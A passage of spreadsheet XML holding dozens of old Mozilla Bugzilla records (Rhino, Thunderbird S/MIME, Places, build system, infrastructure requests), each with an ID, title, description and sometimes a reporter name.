database by deleting the static information cache file
$BUGZILLA_HOME/data/versioncache for further details please have a look at
section 3.5.1 modifying your running system (should be a link)</t>
  </si>
  <si>
    <t>e9625216</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-499339</t>
  </si>
  <si>
    <t>Prod mozillaservice.org logs June 19th 10am - 11:00 am all webheads for debugging issues</t>
  </si>
  <si>
    <t>Can I get a tarball across webheads for the 
web/application/logs/
Prod mozillaservice.org logs June 19th 10am - 11:00. You can give me all morning but I just need this hours worth.</t>
  </si>
  <si>
    <t>RHINO_GRAVEYARD-254778</t>
  </si>
  <si>
    <t>Rhino treats label as separated statement</t>
  </si>
  <si>
    <t>Currently Rhino treats a JavaScript statement with a label as 2 separated
statements. This is visible in any syntax construction that is sensitive to
number of statements. For example in Rhino shell the following prints ERROR!
instead of been silent:
if (false)
	label: print(ERROR)
Another example is the following syntactically correct fragment which currently
fails with syntax errors instead of printing OK:
if (true)
	label: print(OK)
else 
	label: print(ERROR)</t>
  </si>
  <si>
    <t>CORE-231731</t>
  </si>
  <si>
    <t>Add nsIDOMXULTreeElement interface</t>
  </si>
  <si>
    <t>CORE-328040</t>
  </si>
  <si>
    <t>Pages refuse to shrink under certain width</t>
  </si>
  <si>
    <t>Recently pages have started refusing to shrink under a certain width. If the window is made smaller than this first the vertical scrollbar then the page contents will simply be clipped. The width seems to be the minimum width of the navigation toolbar i.e. back/forward/etc. buttons + URL bar + search box. If the page has a live bookmarks icon or secure site icon it's slightly wider.
Testcase in URL field simply shrink the browser to see.
Regression range coming</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-439578</t>
  </si>
  <si>
    <t>Decide what to do when add-ons are pulled but remain on Recommended list</t>
  </si>
  <si>
    <t>We recently ran into a scenario where an author pulled his themes from AMO yet one was still in the Recommended list on production AMO leading to Add-on not found! errors -- see bug 439504.
There are a couple of proposed suggestions (https://bugzilla.mozilla.org/show_bug.cgi?id=439504#c1 and https://bugzilla.mozilla.org/show_bug.cgi?id=439504#c2) so we can use this bug to decide/implement.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-471455</t>
  </si>
  <si>
    <t>re-image qm-pleopard-trunk03</t>
  </si>
  <si>
    <t>Using current talos leopard ref image.
This machine is reporting elevated numbers and no number of reboots seems to solve it.</t>
  </si>
  <si>
    <t>CORE-516265</t>
  </si>
  <si>
    <t>GIF Decoder doesn't send close notifications if it never gets a size</t>
  </si>
  <si>
    <t>cases hang on nytimes.com</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-419916</t>
  </si>
  <si>
    <t>Only package CRT files ifndef MOZ_MEMORY</t>
  </si>
  <si>
    <t>Bug 415928 added an #ifdef MOZ_MEMORY to removed-files.in to remove the CRT files we don't need with jemalloc but left packages-static groping around still trying to package them. If we ifndef them then the build log will only have the enormous spew of expected errors from jemalloc itself to hide real problems beneath :)</t>
  </si>
  <si>
    <t>CORE-476903</t>
  </si>
  <si>
    <t>Setting nsNavHistoryQueryOptions.sortingMode to any value raises exception on Fennec</t>
  </si>
  <si>
    <t>Here's my code:
 let options = this._hsvc.getNewQueryOptions()
 options.sortingMode = options.SORT_BY_DATE_DESCENDING
On Firefox it works fine.  On the Mac build of Fennec 1.0a2 it works fine.  On Fennec on the Nokia the second line raises NS_ERROR_INVALID_ARG.
The code at http://mxr.mozilla.org/mozilla-central/source/toolkit/components/places/src/nsNavHistoryQuery.cpp#1164
indicates that the only way NS_ERROR_INVALID_ARG should be raised is if the argument passed in is greater than SORT_BY_ANNOTATION_DESCENDING.  Dumping the values verifies that SORT_BY_ANNOTATION_DESCENDING is 20 and SORT_BY_DATE_DESCENDING is 4 so it looks like Places thinks 4 &gt; 20 on Fennec.
I wrote a loop with a try/catch to see exactly what values cause the exception to be raised.  Turns out that ANY value from -1 to 20 causes the same exception.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-354273</t>
  </si>
  <si>
    <t>S/MIME signed emails include duplicate cert in chain</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.7) Gecko/20060913 Fedora/1.5.0.7-1.fc5 Firefox/1.5.0.7
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.7) Gecko/20060913 Fedora/1.5.0.7-1.fc5 Firefox/1.5.0.7
I have a Thawte Personal Freemail certificate which has a certificate chain consisting of three certificates:
Thawte Personal Freemail CA (serial number 0x00)
  Thawte Personal Freemail Issuing CA (serial number 0x0D)
    Thawte Freemail Member (my cert serial 0xFCB65)
When I send a signed or signed/encrypted email the sent email does not contain the full certificate chain as it should -- instead it contains two copies of my cert (serial number 0xFCB65) and one copy of the Issuing CA cert (serial number 0x0D).
This has been reproduced with the nightly build 
http://ftp.mozilla.org/pub/mozilla.org/thunderbird/nightly/2006-09-25-06-trunk/thunderbird-3.0a1.en-US.win32.zip
as well as the release versions of Thunderbird 1.5.0.7 on Linux Fedora Core 5 and 1.5.0.5 on Windows.
Reproducible: Always
Steps to Reproduce:
1. Send yourself a signed email or a signed/encrypted email.
2. Save email to disk via Save as.
3. Use OpenSSL to verify the certificate contents:
For a signed-only email:
openssl smime -in email.eml -pk7out | openssl pkcs7 -print_certs -text -noout | grep -A 3 ^Certificate
For a signed/encrypted email first decrypt using
openssl smime -decrypt -in email.eml -recip mycert.pem -inkey mykey.pem
Actual Results:  
The cert with serial 0xFCB65 (mine) is included twice and the root cert with serial 0x0 is not included at all.
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1035109 (0xfcb65)
--
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1035109 (0xfcb65)
--
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 13 (0xd)
Expected Results:  
Here are the results of the openssl certificate print using a signed message from a recent version of Outlook which has the correct behaviour:
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 1035109 (0xfcb65)
--
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 0 (0x0)
--
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 13 (0xd)
This causes interop problems with some software notably Novell Groupwise. Other software may have a problem with this as well.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-58713</t>
  </si>
  <si>
    <t>After delete an account the next account should be selected</t>
  </si>
  <si>
    <t>If you have 5 accounts and delete number 4 number 1 is selected after the delete.
When you delete the next account should be selected.
So deleting number 4 out of 5 should select number 4 of out 4 af the delete.
Deleting number 4 out of 4 should select number 3 of out 3 af the delete.
etc. etc. etc...</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-488570</t>
  </si>
  <si>
    <t>Provide localization note for InfoPlist.strings's BreakpadVendor</t>
  </si>
  <si>
    <t>[4:07pm] ardissone: smorgan: should we add an l10n comment to BreakpadVendor?  I assume the case is odd because it gets inserted into another string via one of those @foo replacements or whatever....
[5:06pm] smorgan: sauron: yeah that's a good point
[5:06pm] smorgan: We should give context say it's an indirect object etc.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-419213</t>
  </si>
  <si>
    <t>Web services changes for Firefox 3 for Russian (ru)</t>
  </si>
  <si>
    <t>Tracking bug for discussion on proposed changes for Russian.
Changes in search engines are tracked in Bug 408880
Per discussion the defaults for mailto and calendar are expected to be:
Mailto: Yandex Rambler Google
Calendar: Yandex Google
The guidelines for making recommendations is here:
http://wiki.mozilla.org/Firefox_web_services_guidelines
For information about Rambler web handler see Bug 408880 comment #26</t>
  </si>
  <si>
    <t>CORE-453776</t>
  </si>
  <si>
    <t>Strange behavior with replace unshift</t>
  </si>
  <si>
    <t>./js
print(fa.replace(/f/g [].unshift))
for (var i = 0 [][i] != undefined ++i)
  print(uneval([][i]))
Prints
3a
f
0
fa
Seems like the first line causes [].unshift to be called with |this| not the global but instead Object.prototype??  If I replace [].unshift with a user-defined function its |this| is the global...</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-386873</t>
  </si>
  <si>
    <t>mozilla-europe is unavailable</t>
  </si>
  <si>
    <t>http://www.mozilla-europe.org/
is just saying:
 MySQL Error : 1040 - Too many connections</t>
  </si>
  <si>
    <t>CORE-267511</t>
  </si>
  <si>
    <t>tons of assertions from bug 204784 fix</t>
  </si>
  <si>
    <t>The fix for bug 204784 causes a constant stream of assertions for me when
loading pages with form controls.  The assertion is no common ancestor at
all??? in
nsLayoutUtils::CompareTreePosition.
For more information see:
https://bugzilla.mozilla.org/show_bug.cgi?id=204784#c27
and onwards.</t>
  </si>
  <si>
    <t>THUNDERBIRD-470185</t>
  </si>
  <si>
    <t>Update mail/ copyright dates to 2009</t>
  </si>
  <si>
    <t>Created attachment 353640
Trunk
+++ This bug was initially created as a clone of Bug #407646 +++
+++ This bug was initially created as a clone of Bug #365621 +++
As inevitable as death and getting the year wrong writing a check.</t>
  </si>
  <si>
    <t>THUNDERBIRD-297356</t>
  </si>
  <si>
    <t>Email disappear if use Fetch Headers only and lost the connection while download the messages</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 .NET CLR 1.1.4322)
Build Identifier: 
The problem is when I enable the Fetch-Headers Only and if i download all the 
headers and I do a click in  Click here to download the rest of the message 
it start to download but if I lost the internet connection then the message 
disappear and I can't download it again but the message is not deleted from 
the server.
I use Mozilla Thunderbird V. 1.0.2(20050317) I have Windows XP SP1 and I test 
this problem in anothers machines and i had the same problem. I used to use a 
satellital connection and is very common lost it.
Reproducible: Always
Steps to Reproduce:
1. Tools Account Settings Server Settings Check the Fetch headers only box
2. Send and email with attachments to yourself.
3. Click on Get Mail click over the new mail and you will see Click here to 
download the rest of the messages
4. While the message is downloading unplug you cable connection or drop it.
Actual Results:  
Your header will disappear and only you can see the text Click here to 
download the rest of the messages and the messages couldn't be downloading 
never more but it is not deleted from the mail server.
Expected Results:  
If I lost the connection Thunderbird must show an error and when the 
connection is restored it should download the message.
Excuseme for my english =)</t>
  </si>
  <si>
    <t>zeque</t>
  </si>
  <si>
    <t>CORE-24744</t>
  </si>
  <si>
    <t>regression from 1/12: timer with sliding font is failing showing white screen</t>
  </si>
  <si>
    <t>Commercial 2000012008 on WinNT 4.0 SP3.
To repro: open URL. Lightning bolt image flashes. Then Netscape N logo appears.
Expected: Next Netscape Communications text appears below N logo spacing 
between letters gradually increases and then screen fades to black.
Actual: Next screen goes white. Netscape Communications text never appears.
Note that this is a regression from Commercial 2000011210 on WinNT 4.0 SP3 in 
which the same page works as expected.
Temporarily assigning to myself as placeholder Marcio will reassign to self and 
simplify. Tentatively designating DOM2 as component.
Marcio could you please analyze this narrow down what is failing to a 
simplified test case and reassign the bug to the appropriate component? vidur 
if it's a DOM2 issue default owner for JavaScript Engine if it's a timer issue. 
Thanks!</t>
  </si>
  <si>
    <t>ekrock</t>
  </si>
  <si>
    <t>WEBSITES-504892</t>
  </si>
  <si>
    <t>Labs site 2.0: Add all content for main page and project subsites to staging</t>
  </si>
  <si>
    <t>When staging is ready to go start piling in content from the wiki.  Fill in all gaps where needed.</t>
  </si>
  <si>
    <t>CORE-404351</t>
  </si>
  <si>
    <t>JavaScript Tests - handle race in some Date tests</t>
  </si>
  <si>
    <t>Created attachment 289332
patch
The following tests include comparisons of (new Date()).toString() vs Date(...). These can fail randomly if the second changes between the times of the two calls. 
ecma/Date/15.9.2.1.js
ecma/Date/15.9.2.2-1.js
ecma/Date/15.9.2.2-2.js
ecma/Date/15.9.2.2-4.js
ecma/Date/15.9.2.2-6.js
The following tests have incorrect headers written to the log.
ecma/Date/15.9.1.1-1.js
ecma/Date/15.9.1.1-2.js</t>
  </si>
  <si>
    <t>FIREFOX-408021</t>
  </si>
  <si>
    <t>Hover feedback for tab close button</t>
  </si>
  <si>
    <t>Created attachment 292711
Patch
I've figured out a way to fix this problem. Its not pretty but its the only way I know of. And believe me I've tried a lot of things.
This will give the tab close button hover feedback while still keeping the tabs at a reasonable size and without causing glitches.</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-493002</t>
  </si>
  <si>
    <t>List partially implemented engines (cookies input history) as disabled</t>
  </si>
  <si>
    <t>There's some outdated engines that we have code for.. so bring them back into the code but keep them disabled.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-282117</t>
  </si>
  <si>
    <t>moreinfo does not show line breaks from extension description</t>
  </si>
  <si>
    <t>When updating an extension's description it strips out the html  tag.  The
text displays fine for FoxyTunes when in the big list but not when looking at
the individual item.  Seems to be different code for showlist and moreinfo.
The good news is that it has the line break in
https://addons.update.mozilla.org/extensions/showlist.php?application=firefox&amp;version=1.0&amp;os=Windows&amp;numpg=50&amp;pageid=2
The bad news is that it keeps eating the html tag so
https://addons.update.mozilla.org/extensions/moreinfo.php?application=firefox&amp;version=1.0&amp;os=Windows&amp;numpg=50&amp;id=219
doesn't have the break and there's nothing I can do about it.</t>
  </si>
  <si>
    <t>SEAMONKEY-171952</t>
  </si>
  <si>
    <t>HP-UX ia64 should not export __shlInit</t>
  </si>
  <si>
    <t>The aCC compiler for ia64 (HP-UX 11.20) doesn't require __shlInit
to be exported for a sharedLibrary (IS_COMPONENT=1) the way
HP_UX 10.20 &amp; 11.00 require it.  In fact it issues a warning if
you try.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-350773</t>
  </si>
  <si>
    <t>SVN enable my account</t>
  </si>
  <si>
    <t>According to Bug 347069 I need to request SVN read/write access for my account (wclouser@mozilla.com).
Thanks</t>
  </si>
  <si>
    <t>SEAMONKEY-506510</t>
  </si>
  <si>
    <t>Disable filters menu item when no accounts are set up</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #67219 +++
When no account are set up the message filters menu is not disabled as it should be. (Fixed for tb in bug 67219.)</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-378958</t>
  </si>
  <si>
    <t>Move NSPR pull-tag for 1.8.1.4 and 1.8.0.12</t>
  </si>
  <si>
    <t>We need to move the NSPR tag to pick up some fixes for the 1.8.1.4 and 1.8.0.12 releases. Not sure what that tag will be yet. Moving the tag will fix bug 363997 and bug 376062 for Firefox (and other clients).</t>
  </si>
  <si>
    <t>MOZILLA.ORG-463672</t>
  </si>
  <si>
    <t>change CVS account login</t>
  </si>
  <si>
    <t>Hi
My CVS account mark@mozilla.com needs to move to mark@plogs.net ... thank you!</t>
  </si>
  <si>
    <t>BUGZILLA-274397</t>
  </si>
  <si>
    <t>Can't edit a saved search after choosing 'Show List' from a bug (and other situations)</t>
  </si>
  <si>
    <t>Steps to reproduce:
1) visit Specific search page so it sets your cookie preference to specific
2) click on a saved search in the footer
3) click on a bug in the list
4) click Show List
5) click Edit Search
Actual results:
you get the specific search page.
Expected results:
either:
1) The same search page your stored query was originally saved from
-or-
2) The advanced search page with the list of bug numbers in the bugs to
include field.</t>
  </si>
  <si>
    <t>CORE-264274</t>
  </si>
  <si>
    <t>support dependent strings in frozen string API</t>
  </si>
  <si>
    <t>Support dependent strings in frozen string API.
I think it was a mistake not to have added an API for this back when we
originally created nsStringAPI.h for mozilla 1.7.  I'd like to propose the
following pair of methods:
  NS_STRINGAPI(nsresult)
  NS_StringContainerInitDep(nsStringContainer &amp;container
                            const PRUnichar *data
                            PRUint32 dataLen = PR_UINT32_MAX)
  NS_STRINGAPI(nsresult)
  NS_CStringContainerInitDep(nsCStringContainer &amp;container
                             const char *data
                             PRUint32 dataLen = PR_UINT32_MAX)
When a string container is initialized using one of these methods we'll say
that it is not necessary to call NS_C?StringContainerFinish.  If dataLen is
PR_UINT32_MAX then the string length is computed automatically.  Also data
must be null terminated.  (We may want to add a flag to indicate whether or
not data is null terminated in case we also wanted to support dependent 
substrings.)
The two main issues this will improve:
  o  enables support for a more efficient version of the NS_LITERAL_C?STRING 
     macro.  Today one must write:
       #define NS_LITERAL_STRING(x) nsEmbedString(L##x)
     This example of course is limited to platforms where the 'L' prefix makes
     sense but that includes Linux and Windows so it pretty much means all of
     our embedding customers.  Today's solution means a heap allocation :-(
  o  enables support for a more efficient charset conversion when starting
     with a raw character array pointer.  Today one must write:
       nsEmbedString result 
       NS_CStringToUTF16(nsEmbedCString(charPtr) NS_CSTRING_ENCODING_UTF8
                         result)
     which results in an intermediate heap allocated copy of the contents of 
     charPtr.</t>
  </si>
  <si>
    <t>FIREFOX-325161</t>
  </si>
  <si>
    <t>support URI property on all result nodes</t>
  </si>
  <si>
    <t>All results have an equivalent URI whether that be the URI of the page or the place: URI that generated them. As a result nsINavHistoryURIResultNode should be dispensed with and the uri property brought down onto nsINavHistoryResultNode.
This will save the client js code a lot of work calling queriesToQueryString which will become fairly common if we store folder and query state as annotations keyed off place: uris.</t>
  </si>
  <si>
    <t>CORE-521350</t>
  </si>
  <si>
    <t>remove nsCSSValue::nsCSSValue(nscolor) constructor</t>
  </si>
  <si>
    <t>Created attachment 405369
patch
The nsCSSValue constructor taking an nscolor argument is a bad idea since nscolor is just PRUint32 it's also unused so we should just remove it.
(Spun off of bug 520396 comment 12.)</t>
  </si>
  <si>
    <t>SEAMONKEY-24617</t>
  </si>
  <si>
    <t>Optimized AIX build coredumps on startup</t>
  </si>
  <si>
    <t>This is the same as http://bugzilla.mozilla.org/show_bug.cgi?id=18875
Need to copy the same fix in for AIX.
xpcom/reflect/xptcall/src/md/unix/Makefile.in
OS_CXXFLAGS         :=  $(filter-out -O $(OS_CXXFLAGS))</t>
  </si>
  <si>
    <t>FIREFOX-317829</t>
  </si>
  <si>
    <t>Support for Arbitrary Property/Annotation based Querying</t>
  </si>
  <si>
    <t>Queries should be able to be constructed based on the presence or value of arbitrary properties which are stored separately in the annotation table.</t>
  </si>
  <si>
    <t>CORE-215041</t>
  </si>
  <si>
    <t>Add support for WinIE's _main target for sidebars (in addition to _content)</t>
  </si>
  <si>
    <t>WinIE supports the _main target.  Currently our target is called _content.  This patch adds support 
for _main so that we have WinIE compatibility with all of their Explorer Bars in both SeaMonkey 
and Firebird.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-491380</t>
  </si>
  <si>
    <t>Talos reboots (20090504 edition)</t>
  </si>
  <si>
    <t>Just one for now:
qm-plinux-fast03</t>
  </si>
  <si>
    <t>WEBSITES-509222</t>
  </si>
  <si>
    <t>Labs 2.0 site: No bullets on unordered lists in blog posts or pages</t>
  </si>
  <si>
    <t>Example: http://labs-wpmu.stage.mozilla.com/blog/2009/07/31/maecenas-vitae-odio-vitae-diam-molestie/
The first list is a  and the second is .  Ordered list is fine but the unordered is missing bullets.</t>
  </si>
  <si>
    <t>TOOLKIT-252486</t>
  </si>
  <si>
    <t>Add option to disable saving form data on https websites</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040719 Firefox/0.9.1+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040719 Firefox/0.9.1+
There should be an option to disable Saved Form for secured website because
everytime I'm buying something online my credit card number is saved and I have
to clear all the saved form.
Reproducible: Always
Steps to Reproduce:
1. go to a https site
2. enter credit card #
Actual Results:  
credit card numbers is saved
Expected Results:  
credit card numbers shouldn't be saved</t>
  </si>
  <si>
    <t>eddy.b.ferreira</t>
  </si>
  <si>
    <t>ladude626-cow</t>
  </si>
  <si>
    <t>TOOLKIT-288984</t>
  </si>
  <si>
    <t>Remove regchrome from toolkit</t>
  </si>
  <si>
    <t>With the changes to the toolkit chrome registry (bug 278534) the regchrome
tool doesn't make any sense and should be removed.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-300114</t>
  </si>
  <si>
    <t>XPInstall dialog does not show when making use of browser.link.open_external:1 (default on aviary1.0)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b3) Gecko/20050708 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b3) Gecko/20050708 Firefox/1.0+
Since 20050707 builds installing extensions by double clicking on the saved
filename.xpi is not possible anymore. Also after unsuccessful calling of the
xpinstall dialog dragging and dropping files (extensions) on the browser window
is not possible.
This bug is probably caused by the one of security bugs that were fixed in this
build (bug 298255 and bug 298892).
Reproducible: Always
Steps to Reproduce:
1. Try to install saved extension by double clicking on it
(browser.link.open_external:1) = Tools -&gt; Options... -&gt; Tabs - 'Open links from
other applications in:' - 'the most recent tab/window'
Actual Results:  
The XPInstall dialog does not show -&gt; extension can not be installed.
Expected Results:  
The XPInstall dialog does show and allows to install the extension.</t>
  </si>
  <si>
    <t>maxxmozilla</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-403085</t>
  </si>
  <si>
    <t>web services review</t>
  </si>
  <si>
    <t>please update trunk with the status of search on the branch</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-332652</t>
  </si>
  <si>
    <t>The same keys conflict in top-level Tools menu</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20060404 Firefox/1.6a1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20060404 Firefox/1.6a1
if you installed the chatzilla it added a menuitem into the tools menu.
but the accesskey of ChatZilla conflicts with  JavaScript Console .Both are C
Reproducible: Always
Steps to Reproduce:
1.Launch firefox and expand Tools menu
2.the item ChatZilla and the item JavaScipt Console have the same acces
Actual Results:  
if you press Ctrl+C it switches between two items .
Expected Results:  
two items should have the different accesskey.</t>
  </si>
  <si>
    <t>changdong.cui</t>
  </si>
  <si>
    <t>CORE-429281</t>
  </si>
  <si>
    <t>JS_SetTrap does not unroot a fresh trap before calling free on it</t>
  </si>
  <si>
    <t>Currently JS_SetTrap does not release a root for the newly created trap when after relocking the runtime the code discovers that the debugger has added a trap for the same pc on another thread. See http://lxr.mozilla.org/seamonkey/source/js/src/jsdbgapi.c#124 for details.
When this is triggered js_GC() would eventually dereference a pointer to the freed memory when enumerating roots created with JS_AddRoot.</t>
  </si>
  <si>
    <t>RHINO_GRAVEYARD-397036</t>
  </si>
  <si>
    <t>NPE with FEATURE_ENHANCED_JAVA_ACCESS</t>
  </si>
  <si>
    <t>Turning on FEATURE_ENHANCED_JAVA_ACCESS breaks a bunch
of our unit tests they're generally failing on line ScriptableObject:1483
-- obj.getParentScope() is throwing a NullPointerException.
I've been trying to isolate the failure cases since the exception tends
to be thrown in fairly complex code.  The first one I found is this:
js&gt; new java.io.File('').getClass().getMethods()
[Ljava.lang.reflect.Method@f894ce
You can call getMethods() on the class object returned by getClass()
but with FEATURE_ENHANCED_JAVA_ACCESS it can't find the
getMethods() method:
js&gt; new java.io.File('').getClass().getMethods()
js:  line 2: uncaught JavaScript runtime exception: TypeError: Cannot find function getMethods.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-421510</t>
  </si>
  <si>
    <t>botrunner should not try to update buildbot</t>
  </si>
  <si>
    <t>Until we can figure out a way to do this that won't cause tree redness or other disruptions we need to disable this feature in botrunner.</t>
  </si>
  <si>
    <t>TOOLKIT-302066</t>
  </si>
  <si>
    <t>Move SW/U Styles into Skin CSS</t>
  </si>
  <si>
    <t>Right now for ease of development they're in content/update.css... need to move
them into skin css so I can fix the mac issues in a platform dependent way.</t>
  </si>
  <si>
    <t>CORE-368400</t>
  </si>
  <si>
    <t>Contents are not displayed in print preview</t>
  </si>
  <si>
    <t>Print preview works again by FIXED of bug367433. 
But contents are not displayed in the window of print preview at all. 
Even if save is done with PDF it is the same. 
Reproducible: Always
Mac OS X 10.3.9
Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.9a2pre) Gecko/20070127 Minefield/3.0a2pre</t>
  </si>
  <si>
    <t>FIREFOX-413068</t>
  </si>
  <si>
    <t>Bookmark Contextual Dialog: Removal notification</t>
  </si>
  <si>
    <t>After clicking Remove Bookmark the user should receive a notification informing them that the bookmark has been removed with an undo button to reverse the removal.  
Mockup available at: http://people.mozilla.com/~faaborg/files/granParadisoUI/places_NewBookmarkDialog_i9.png</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-342987</t>
  </si>
  <si>
    <t>FAQ has dangling links to update.php</t>
  </si>
  <si>
    <t xml:space="preserve">https://addons.mozilla.org/faq.php links to https://addons.mozilla.org/update.php twice in the first section. (This service has undergone _several_changes_ and We will be posting frequent _status_updates_) and https://addons.mozilla.org/update.php returns an empty RDF document: 
</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-497505</t>
  </si>
  <si>
    <t>Talos reboots (20090610)</t>
  </si>
  <si>
    <t>talos-rev1-vista04</t>
  </si>
  <si>
    <t>CORE-303006</t>
  </si>
  <si>
    <t>[FIX]ASSERTION: Placeholder relationship should have been torn down</t>
  </si>
  <si>
    <t>ASSERTION: Placeholder relationship should have been torn down:
'!shell-&gt;FrameManager()-&gt;GetPlaceholderFrameFor(mOutOfFlowFrame)' file
c:/work/mozilla/builds/ff/trunk/mozilla/layout/generic/nsPlaceholderFrame.cpp
line 96
Found using a CVS debug build from 7/31 on WinXP during top site testing of 5469
pages. It appears to be new although I don't have good history of logs for full
top site testing.
I doubt this is related to the splitwindow bug but ccing jst just in case.</t>
  </si>
  <si>
    <t>CORE-712188</t>
  </si>
  <si>
    <t>Networking: WebSockets</t>
  </si>
  <si>
    <t>Return correct websocket close code when browser navigates away from page.</t>
  </si>
  <si>
    <t>Created attachment 583028
Return correct websocket close code when brower navigates away from page
Right now we close with 1000 (CLOSE_NORMAL) if Cancel is called.  But the IETF spec provides a code (1002: GOING_AWAY) for exactly this case.
No easy way to test this automatically (we'd have to rig pywebsocket to report failure/success: doesn't seem worth the considerable effort and code fork)--I will test by hand.
We could provide an error string here if we want in addition to the code but spec says it's optional and I don't think we need it.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-437104</t>
  </si>
  <si>
    <t>Create two new win32 VMs from win2k3sp2-vc8tools-ref-vm</t>
  </si>
  <si>
    <t>Can you please create two new win32 VMs called:
moz2-win32-slave05.build.mozilla.org
moz2-win32-slave06.build.mozilla.org
Note: while the usual win32 VMs have three disks 9.7gb/20gb/15gb can you please
create these new VMs with slightly larger 3rd disk of 30gb? ie create
9.7gb/20gb/30gb disks?</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-270415</t>
  </si>
  <si>
    <t>should not be able to drag mailing list onto itself</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
You can drop a mailing list into the same mailing list
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
Actual Results:  
A contact is created...
Expected Results:  
the mailing lists must not be viewable</t>
  </si>
  <si>
    <t>rnoel</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-519160</t>
  </si>
  <si>
    <t>Delete/rename/merge old account kinetik@linuxstart.com</t>
  </si>
  <si>
    <t>I have an old account in bugzilla (kinetik@linuxstart.com) that causes an ambiguity error when people try to assign bugs to me using kinetik.  I could hack around it by having adding :kinetik to my name but I was hoping I could just have the old account deleted renamed or merged with my current one.</t>
  </si>
  <si>
    <t>CORE-459677</t>
  </si>
  <si>
    <t>default DPI on windows mobile?</t>
  </si>
  <si>
    <t>Created attachment 342887
patch v.1
in the nsThebesDeviceContext  on windows we call GetDeviceCaps to figure out the DPI for the display.  On the htc this value is 360 (iirc it was ~360).  This caused the browser window to only fill about 1/4 of the screen.  We hard coded this value to be 96 and that seems to have worked for the most part however that caused the fennec canvas to not display:
http://dougt.files.wordpress.com/2008/10/200810101458.jpg?w=480&amp;h=640
When we set this value to 48 we did get the correct result:
http://people.mozilla.org/~blassey/fennec_splash.PNG</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-370131</t>
  </si>
  <si>
    <t>Seamonkey 1.1 NL : Composer</t>
  </si>
  <si>
    <t>Plaats hier de fouten gevonden in de composer</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-508406</t>
  </si>
  <si>
    <t>Speed up backupsnip</t>
  </si>
  <si>
    <t>Right now we backup the whole (releases) snippet store each time we want to push out more release snippets but it takes around 50 minutes to pull tens of thousands of small files in a deep dir structure from the NFS mount. We should investigate doing this smarter eg making a daily full backup and teaching backupsnip to only backup the directories/snippets that are going to change. This should be muuuuuch master and may allow us to enforce that backupsnip is run before every snippet push (eg 3.5.2 followed by 3.0.13 followed by 3.0.13 MU).</t>
  </si>
  <si>
    <t>CORE-524865</t>
  </si>
  <si>
    <t>DebugPrintAllKeyboardLayouts is 80% of startup time</t>
  </si>
  <si>
    <t>DebugPrintAllKeyboardLayouts adds 20s to my normally 5s startup time (on a 1.8GHz Mac Mini).  Please make it ifdef DEBUG_KEYBOARD_LAYOUTS or dependent on a prlogging env var or something.</t>
  </si>
  <si>
    <t>CORE-177475</t>
  </si>
  <si>
    <t>Make radio buttons pretty</t>
  </si>
  <si>
    <t>The radio buttons look jagged and ugly.
Can they be made to look more polished?</t>
  </si>
  <si>
    <t>FIREFOX-324856</t>
  </si>
  <si>
    <t>nsNavBookmarks::RemoveFolderChildren should notify observers</t>
  </si>
  <si>
    <t>CORE-419383</t>
  </si>
  <si>
    <t>Extract native Vista toolbar styles and expose to Themes</t>
  </si>
  <si>
    <t>We would like to use the silver toolbar appearance on Vista for the main window of Firefox and the media toolbar appearance (black) in the Library window.
